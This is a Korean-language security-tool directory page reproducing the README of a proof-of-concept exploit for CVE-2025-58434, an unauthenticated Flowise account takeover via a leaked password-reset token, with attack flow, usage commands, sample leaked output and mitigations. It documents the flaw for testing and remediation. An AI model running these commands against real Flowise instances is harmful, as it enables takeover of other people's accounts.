Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-58434-poc — 유출된 암호 재설정 토큰을 통한 Flowise의 인증되지 않은 계정 탈취를 시연하는 CVE-2025-58434용 개념 증명 익스플로잇입니다. 토큰 유출 및 암호 재설정의 2단계 공격을 포함합니다. | Kitploit
도구/GitHubGitHub/kartik2005221/cve-2025-58434-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & EducationRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

유출된 암호 재설정 토큰을 통한 Flowise의 인증되지 않은 계정 탈취를 시연하는 CVE-2025-58434용 개념 증명 익스플로잇입니다. 토큰 유출 및 암호 재설정의 2단계 공격을 포함합니다.

저장소 보기
1385개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-58434 — 토큰 노출을 통한 Flowise 계정 탈취

CVE CVSS Python License Disclosure

⚠️ 이 저장소는 교육 및 공인된 보안 연구 목적으로만 제공됩니다.
소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법입니다.


목차

  • 개요
  • 취약점 세부 정보
  • 공격 흐름
  • 영향을 받는 버전
  • 저장소 구조
  • 요구 사항
  • 설치
  • 사용법
  • 예시 출력
  • 수정 및 완화 조치
  • 공개 타임라인
  • 참고 자료
  • 면책 조항

개요

Flowise(클라우드 호스팅 및 자체 호스팅 모두)의 forgot-password 엔드포인트는 유효한 비밀번호 재설정 토큰(tempToken)을 이메일 검증이나 인증 없이 HTTP 응답 본문에 직접 반환합니다.

이로 인해 피해자의 이메일 주소를 알거나 추측할 수 있는 공격자는 다음을 수행할 수 있습니다:

  1. forgot-password 엔드포인트 호출 → JSON 응답에서 tempToken 획득
  2. tempToken을 사용하여 reset-password 호출 → 임의의 새 비밀번호 설정
  3. 피해자로 로그인 → 완전한 계정 탈취(ATO)

사전 접근 권한, 사용자 상호 작용, 이메일 접근 권한이 필요하지 않습니다.


취약점 세부 정보

필드값
CVE IDCVE-2025-58434
CVSS 점수9.8 (Critical)
CVSS 벡터CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-640: 취약한 비밀번호 복구 메커니즘
유형인증 우회 / 안전하지 않은 직접 객체 참조
영향을 받는 앱Flowise (클라우드 + 자체 호스팅)
엔드포인트 1POST /api/v1/account/forgot-password
엔드포인트 2POST /api/v1/account/reset-password

근본 원인

forgot-password 핸들러는 생성된 tempToken을 포함한 전체 사용자 레코드를 등록된 이메일 주소로만 보내는 대신 API 응답에 직접 반환합니다.

root@kitploit:~
{
  "user": {
    "id": "<uuid>",
    "name": "Victim Name",
    "email": "[email protected]",
    "credential": "<bcrypt-hash>",
    "tempToken": "<LEAKED_TOKEN_HERE>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

공격 흐름

root@kitploit:~
Attacker                              Flowise API
   │                                       │
   │  POST /forgot-password {email}        │
   │──────────────────────────────────────►│
   │                                       │  (generates tempToken)
   │◄──────────────────────────────────────│
   │  201 { tempToken: "abc123..." }       │
   │                                       │
   │  POST /reset-password {email,         │
   │         tempToken, newPassword}       │
   │──────────────────────────────────────►│
   │                                       │
   │◄──────────────────────────────────────│
   │  200 OK  (password changed!)          │
   │                                       │
   ✓  Account Takeover Complete

영향을 받는 버전

  • Flowise Cloud (cloud.flowiseai.com) — 영향 확인됨
  • 패치 이전의 모든 자체 호스팅 Flowise 배포

패치된 릴리스 정보는 공식 Flowise GitHub에서 확인하세요.


저장소 구조

root@kitploit:~
CVE-2025-58434/
├── cve_2025_58434_poc.py   # Main PoC script (two-stage ATO)
├── requirements.txt         # Python dependencies
├── README.md                # This file
└── DISCLAIMER.md            # Legal notice (read before use)

요구 사항

  • Python 3.7 이상
  • requests 라이브러리

설치

root@kitploit:~
# Clone the repository
git clone https://github.com/yourhandle/CVE-2025-58434
cd CVE-2025-58434

# Install dependencies
pip install -r requirements.txt

사용법

도움말 화면

root@kitploit:~
python3 cve_2025_58434_poc.py --help

1단계 — 토큰 유출 (정찰)

인스턴스가 취약한지 확인하고 비밀번호를 재설정하지 않은 채 tempToken을 검색합니다.

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected]

2단계 — 완전한 계정 탈취

유출된 토큰을 사용하여 즉시 비밀번호를 재설정합니다.

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --reset \
  --new-password "MyNewP@ss2025!"

원시 JSON 응답 덤프

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --json-output

모든 옵션

플래그약어설명기본값
--url URL-uFlowise 인스턴스의 기본 URL(필수)
--email EMAIL-e대상 계정 이메일 주소(필수)
--reset-r2단계 수행: 유출된 토큰으로 비밀번호 재설정False
--new-password PASS-p설정할 새 비밀번호 (--reset과 함께 사용)Changeme@2025!
--timeout SECONDS-tHTTP 요청 시간 초과10
--json-output-j원시 JSON API 응답을 stdout으로 출력False

예시 출력

root@kitploit:~
  [Step 1] Sending forgot-password request …
  [*] HTTP Status : 201

  ========================================================================
    LEAKED ACCOUNT DATA
  ========================================================================
    User ID       : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
    Name          : Admin User
    Email         : [email protected]
    Credential    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Status        : active
    tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
    tokenExpiry   : 2025-08-19T13:00:33.834Z
  ========================================================================

  [+] tempToken obtained  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  [!] VULNERABLE: The instance leaks password reset tokens unauthenticated!

수정 및 완화 조치

Flowise 인스턴스 운영자라면 다음 완화 조치를 즉시 적용하세요:

  1. API 응답에 재설정 토큰을 절대 반환하지 마세요. 토큰은 등록된 이메일 주소로만 전송하세요.
  2. 이메일 존재 여부와 관계없이 forgot-password에서 일반적인 성공 메시지를 반환하세요. 계정 열거(enumeration)도 방지할 수 있습니다.
  3. 토큰 제약 조건을 적용하세요:
    • 일회용(최초 사용 후 무효화)
    • 짧은 만료 시간(예: 15분)
    • 가능한 경우 요청 IP / User-Agent에 바인딩
  4. 클라우드 및 자체 호스팅 등 모든 배포 모델에 수정 사항을 적용하세요.
  5. forgot-password 엔드포인트에 속도 제한(rate limiting)을 추가하세요.
  6. 비정상적인 비밀번호 재설정 활동을 기록하고 알림을 설정하세요.
  7. 관리자 및 고권한 계정에는 MFA를 도입하는 것을 고려하세요.

공개 타임라인

날짜이벤트
2025-08-19취약점 발견 및 보고
TBD공급업체 확인
TBD패치 릴리스
TBD공개 공개

참고 자료

  • GitHub Advisory GHSA-wgpv-6j63-x5ph
  • NVD — CVE-2025-58434
  • Flowise GitHub Repository
  • CWE-640: Weak Password Recovery Mechanism

면책 조항

이 프로젝트는 교육 목적 및 공인된 침투 테스트를 위해서만 제공됩니다.

  • 시스템 소유자의 명시적 서면 허가 없이 이 도구를 어떤 시스템에도 실행하지 마십시오.
  • 이 저장소의 저자는 무단 사용으로 인한 오용, 손해 또는 법적 결과에 대해 책임을 지지 않습니다.
  • 전체 법적 고지는 DISCLAIMER.md를 참조하세요.
도구 다운로드